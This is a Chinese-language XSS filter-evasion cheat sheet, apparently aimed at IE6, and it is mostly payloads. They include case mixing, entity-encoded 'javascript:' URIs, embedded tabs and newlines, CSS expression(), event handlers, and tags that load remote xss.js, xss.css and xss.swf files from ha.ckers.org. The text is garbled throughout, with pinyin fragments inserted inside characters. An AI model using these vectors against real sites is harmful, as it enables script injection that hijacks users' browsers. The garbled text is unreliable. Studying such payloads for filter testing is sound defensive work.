XSS不具有瀏覽器通用性。不同的瀏覽器對(duì)同一XSS的適用不一樣。相比較而言，IE8和Firefox相對(duì)更安全，本身就對(duì)XSS攻擊有更嚴(yán)格的過濾。而IE6的安全性一般，即使攻擊者的代碼有些“變形”，瀏覽器還是會(huì)“盡力而為”的解析。而其他的一些瀏覽器如opera，XSS安全處理可能做得更差。

本文基本上是在IE6的基礎(chǔ)上給大家分析XSS的變形和繞過。以便大家有針對(duì)性的防護(hù)。作者參閱了互聯(lián)網(wǎng)上一些XSS攻防實(shí)戰(zhàn)的例子，匯總成此文。

一、具體內(nèi)容

XSS的一般原始構(gòu)造:

<script>alert("anyunix")</script>

上述構(gòu)造方式由于太過直接而容易被過濾，實(shí)際上，針對(duì)不同站點(diǎn)的不同過濾機(jī)制，對(duì)原始構(gòu)造的適當(dāng)變形有時(shí)就能繞過不少對(duì)XSS的檢測(cè)。

二、發(fā)展

1:很簡(jiǎn)單，大家都知道會(huì)把<script>過濾掉,卻往往忽略了大小寫:

<sCripT>alert("anyunix")</Script>

2:<script>徹底被過濾了也不要緊，很多對(duì)象可以支持“javascript:”的形式代碼執(zhí)行:

<IMG SRC=javascript:alert("anyunix")>

3：當(dāng)簡(jiǎn)單的"javascript"形式也被徹底過濾后。我們發(fā)現(xiàn)很多對(duì)象支持“&#ASCII”的表示方法，

<img src=j&#97vascript:alert("anyunix")>

<img src=j&#97;vascript:alert('anyunix')>

<img src=j&#x61vascript:alert('anyunix')>

<img src=j&#x61;vascript:alert('anyunix')>

&#97可以寫成&#097,&#0097直至&#0000097也是可以執(zhí)行的。

&#x61也是可以寫成&#061,&#0061直至&#000061的。

4:如果上述編碼亦被還原過濾，可以填入空格、制表符、換行符等空白字符：

<IMG SRC="jav ascript:alert('anyunix');">

5:也可以嵌入編碼過后的TAB鍵等,char09,char10,char13都可以被嵌入:

<IMG SRC="jav&#x09;ascript:alert('anyunix');">

<IMG SRC="jav&#x0A;ascript:alert('anyunix');">

<IMG SRC="jav&#x0D;ascript:alert('anyunix');">

6:當(dāng)直接用“javascript”終于被徹底禁絕，我們還可以使用其他屬性執(zhí)行XSS。

<DIV STYLE="width:expression(alert('anyunix'));">

<IMG SRC='vbscript:msgbox("anyunix")'>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

7:然后，理所當(dāng)然衍生了新的繞過方式和利用形式。

A):插入注釋/*....*/做干擾

<IMG STYLE="xss:expr/*XSS*/ession(alert('anyunix'))">

B):全角字符的干擾

<DIV STYLE="width:ｅｘpreｓsion(alert('anyunix'));">

C):“\”的干擾

<STYLE>@im\po\rt'http://ha.ckers.org/xss.css';</STYLE>

8:如果直接執(zhí)行被完全過濾，那我們就利用事件來(lái)執(zhí)行XSS

<img src="#"onerror=alert('anyunix')>

<img src=http://images.51cto.com/files/uploadimg/20130407/1014480.png"onmousemove=alert(163)>

<BODY ONLOAD=alert('anyunix')>

<isindex type=imagesrc=1onerror=alert('anyunix')>

9:flash可以用來(lái)執(zhí)行XSS

<EMBED SRC="http://ha.ckers.org/xss.swf"AllowScriptAccess="always"></EMBED>

10:也可以利用各種其他標(biāo)簽

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<LINK REL="stylesheet"HREF="http://ha.ckers.org/xss.css">

<TABLE BACKGROUND="javascript:alert('XSS')">

其他的一些用于混淆、干擾和繞過的bypass實(shí)例:

<SCRIPTa=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPTa=">'>"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

perl-e'print"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";'>out

<IMG SRC="&#14; javascript:alert('XSS');">

如上，就是一些比較常見和實(shí)用的XSS繞過方法。在實(shí)際的運(yùn)用中，往往是多種方法結(jié)合起來(lái)。

更多更詳盡的XSS測(cè)試腳本，可參見http://ha.ckers.org/xss.html建議參閱《OWASP測(cè)試指南》，對(duì)一些相關(guān)的web安全知識(shí)做全面的了解。

By:anyunix